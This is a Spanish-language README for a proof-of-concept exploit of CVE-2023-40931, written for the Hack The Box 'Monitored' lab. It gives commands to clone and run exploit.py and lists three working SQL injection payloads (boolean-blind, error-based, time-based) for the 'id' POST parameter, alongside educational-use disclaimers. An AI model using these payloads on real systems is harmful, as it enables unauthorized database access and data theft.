
Prueba de concepto de CVE-2023-40931 realizada para HTB MONITORED
Este repositorio contiene una Prueba de Concepto (PoC) para CVE-2023-40931, una vulnerabilidad de seguridad identificada en [software/sistema afectado]. El propósito de este repositorio es demostrar la vulnerabilidad únicamente con fines educativos y de investigación. 🛠️
Este proyecto está destinado únicamente a fines educativos y pruebas autorizadas. El uso indebido de este código puede acarrear consecuencias legales. Los autores no se hacen responsables de ningún uso indebido o daño causado por este código. Obtenga siempre la autorización adecuada antes de probar cualquier sistema. 🔒
Para obtener más información, consulte la entrada oficial de CVE: CVE-2023-40931. 🔗
Clone el repositorio:
git clone https://github.com/yourusername/CVE-2023-40931-POC.git
cd CVE-2023-40931-POC
python3 exploit.py
El parámetro POST 'id' es vulnerable. Los siguientes payloads explotaron la vulnerabilidad con éxito:
Ciega basada en booleanos: Este payload utiliza una declaración condicional para determinar el valor de verdad de una consulta, lo que permite extraer datos mediante lógica booleana.
action=acknowledge_banner_message&id=(SELECT (CASE WHEN (2064=2064) THEN 3 ELSE (SELECT 4367 UNION SELECT 3803) END))Basada en errores: Este payload explota los mensajes de error de la base de datos para extraer información mediante la activación de errores específicos.
action=acknowledge_banner_message&id=3 OR (SELECT 9867 FROM(SELECT COUNT(*),CONCAT(0x71787a7671,(SELECT (ELT(9867=9867,1))),0x716a786271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)Ciega basada en tiempo: Este payload utiliza retardos de tiempo para inferir información observando el tiempo de respuesta del servidor.
action=acknowledge_banner_message&id=3 AND (SELECT 9475 FROM (SELECT(SLEEP(5)))Robc)Estos payloads demuestran la susceptibilidad de la vulnerabilidad a ataques de inyección SQL. Proceda con precaución y asegúrese de contar con la autorización adecuada antes de realizar pruebas. 🔒
Siga las instrucciones del archivo exploit.py para ejecutar el PoC. 🧑💻
Nota: Asegúrese de tener instaladas las dependencias requeridas. ✅